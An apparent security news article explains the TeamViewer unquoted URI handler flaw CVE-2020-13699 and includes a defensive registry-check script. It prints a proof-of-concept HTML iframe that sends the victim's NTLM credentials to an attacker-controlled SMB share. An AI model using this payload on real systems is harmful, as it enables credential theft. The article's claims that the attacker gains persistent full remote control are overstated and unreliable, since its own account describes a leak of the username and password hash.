TeamViewer, a popular software application for remote connection and desktop sharing, has recently disclosed a new vulnerability that allows an attacker to steal the system password remotely, and with ease.
The company recently released a new version that patches this severe vulnerability, CVE-2020-13699, and issued an official statement about it. If you have TeamViewer installed on your systems, make sure you update it to the newest version available.
What is the new TeamViewer flaw?
The vulnerability was first discovered by Jeffrey Hofmann, a security researcher from Praetorian. He said that it resides in the way the application quotes its custom URI handlers: because the handlers are not properly quoted, an attacker can force the application to relay an NTLM authentication request to an attacker-controlled system.
What is NTLM Authentication?
Windows Challenge/Response (NTLM) is the authentication protocol used on networks that include systems running the Windows operating system and on stand-alone systems. NTLM credentials are based on data obtained during the interactive logon process and consist of the following:
- A Domain name
- A Username
- One way hash of the user password
In a usual login process, whenever you log in, your credentials are matched against the credentials in the database over a secure, encrypted channel. If the credentials match, you get access to the account; otherwise you get an error.
However, the NTLM authentication process is slightly different.
In NTLM authentication, an encrypted challenge/response protocol is used to authenticate the user without sending the user's password over the wire. Instead of the system asking for the username and password, as happens in a usual login, the system requesting authentication must prove that it has access to the secured NTLM credentials by performing a complex calculation.
For more detailed information on NTLM authentication, read Microsoft's official explanation: Microsoft NTLM – Win32 Apps.
How does the TeamViewer vulnerability work?
Earlier we mentioned that the way the application quotes its URI handlers lets an attacker force it to relay an NTLM authentication request to the attacker's system. In practice, an attacker can use TeamViewer's built-in URI scheme from a web page to trick the application installed on the victim's computer into initiating a connection to an attacker-owned system over an SMB share.
Take this code as an example:
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="utf-8">
      <title>Demo Page</title>
      <meta name="page_name" content="Demo Page">
      <meta name="author" content="attacker">
      <link href="style.css" rel="stylesheet">
    </head>
    <body>
      <!-- The text after the scheme reaches TeamViewer.exe as arguments because the handler does not quote it -->
      <iframe src="teamviewer10: --play \\attacker-IP-address\share\fakesomething.tvs"></iframe>
    </body>
    </html>
Consider this example of a “fake web page” designed by the attacker: the attacker only has to trick the victim into visiting it. Once the victim opens the page, the code in the “iframe” triggers the TeamViewer Windows desktop client on the victim’s computer, which is launched automatically; this gives the attacker open access.
So even if the victim closes TeamViewer, the access remains intact because the hidden process keeps running in the background, allowing the attacker to gain remote access to the victim’s computer without needing the victim’s user account authentication.
In other words, a hacker can easily take full control of the victim’s computer system.
The triggered access can leak the system’s username and the NTLMv2-hashed version of the password to the attacker, which can be used to access the victim’s computer system and even network resources.
This vulnerability is categorized as:
- Product: TeamViewer Windows Desktop Application
- Developer: TeamViewer GmbH
- Vulnerability: Unquoted URI handler
- Affected Versions: Versions < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3
This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1.
This issue was remediated by quoting the parameters passed by the aforementioned URI handlers, e.g. URL:teamviewer10 Protocol "C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1"
Source – Jeffrey Hofmann
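A defender-side check for the remediation described above, as an added example that is not from the original page or from TeamViewer: it classifies each listed URI handler's open command by whether `%1` is quoted. It assumes the handlers are registered at the standard Windows location `HKEY_CLASSES_ROOT\<scheme>\shell\open\command`; the function names and sample commands are constructed for illustration.

```python
import re
import sys

# Handler names listed in the advisory text above.
HANDLERS = [
    "teamviewer10", "teamviewer8", "teamviewerapi", "tvchat1", "tvcontrol1",
    "tvfiletransfer1", "tvjoinv8", "tvpresent1", "tvsendfile1",
    "tvsqcustomer1", "tvsqsupport1", "tvvideocall1", "tvvpn1",
]

# %1 counts as quoted only when wrapped directly in double quotes: "%1"
_PLACEHOLDER = re.compile(r'("?)%1("?)')

def classify_command(command):
    """Return 'missing', 'no-placeholder', 'quoted' or 'unquoted'."""
    if not command:
        return "missing"
    hits = _PLACEHOLDER.findall(command)
    if not hits:
        return "no-placeholder"
    if all(left == '"' and right == '"' for left, right in hits):
        return "quoted"
    return "unquoted"

def audit_handlers(commands):
    """Map each advisory handler name to its classification."""
    return {name: classify_command(commands.get(name)) for name in HANDLERS}

def read_registry_commands():
    """Read HKEY_CLASSES_ROOT\\<scheme>\\shell\\open\\command (Windows only)."""
    import winreg
    found = {}
    for name in HANDLERS:
        try:
            path = name + r"\shell\open\command"
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, path) as key:
                found[name] = winreg.QueryValueEx(key, "")[0]  # default value
        except OSError:
            pass  # handler not registered on this machine
    return found

if __name__ == "__main__":
    # Constructed sample: one patched entry, one pre-patch style entry.
    exe = r'"C:\Program Files (x86)\TeamViewer\TeamViewer.exe"'
    sample = {"teamviewer10": exe + ' "%1"', "tvchat1": exe + " %1"}
    commands = read_registry_commands() if sys.platform == "win32" else sample
    for name, status in audit_handlers(commands).items():
        print(f"{name:16} {status}")
```

Any handler reported as `unquoted` on a machine with TeamViewer installed indicates a build that predates the fix and should be updated.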
Thankfully, TeamViewer has patched the vulnerability in time, so it is advisable to update the application installed on your computer system to the latest version. Although this is a high-risk vulnerability, it is not being exploited repeatedly; however, because the application is hugely popular, with a user base in the millions, it often becomes an attractive target for attackers.